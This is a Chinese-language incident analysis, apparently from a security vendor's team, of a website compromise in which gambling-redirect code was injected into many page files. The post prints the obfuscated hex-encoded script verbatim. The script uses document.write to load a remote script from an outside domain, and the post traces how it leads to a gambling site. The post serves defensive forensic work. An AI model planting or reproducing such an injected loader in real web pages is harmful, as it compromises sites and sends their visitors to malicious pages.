背景概述

近日深信服安全感知平台发现客户服务器中的文件被篡改,植入博彩页面。经深信服安全团队排查,发现大量网页文件被篡改,且被篡改的时间非常密集,如下图所示在2019年3月26日 16:46左右网站目录下产生大量恶意文件。

入侵分析

排查篡改目录下最早被篡改的文件,创建时间为2019年3月14日13:53。

排查被篡改的网站文件,均在头部位置发现了恶意代码,如下图所示:

恶意代码内容如下:

<script>var _0x150a=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x61\x74\x61\x70\x69\x38\x38\x38\x2E\x63\x6F\x6D\x2F\x67\x6C\x6F\x62\x61\x6C\x2F\x73\x74\x61\x74\x69\x63\x2F\x6A\x73\x2F\x74\x2E\x70\x68\x70\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0x150a[1]](_0x150a[0]);</script>
经hex转换解码后发现是一段恶意js脚本,即通过document.write写入恶意链接http://atapi888.com/global/static/js/t.php,js内容如下图所示:

通过浏览器访问http://atapi888.com/global/static/js/t.php后,发现返回内容同样为编码后的内容,如下图所示:

查看源码,发现此处还有一个博彩流量统计网站http://count.51yes.com/。

将以上编码的内容hex转换解码后得到如下图所示网址,即通过windows.location.href打开新窗口https://www.1851147.com。

点击收藏 | 1 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖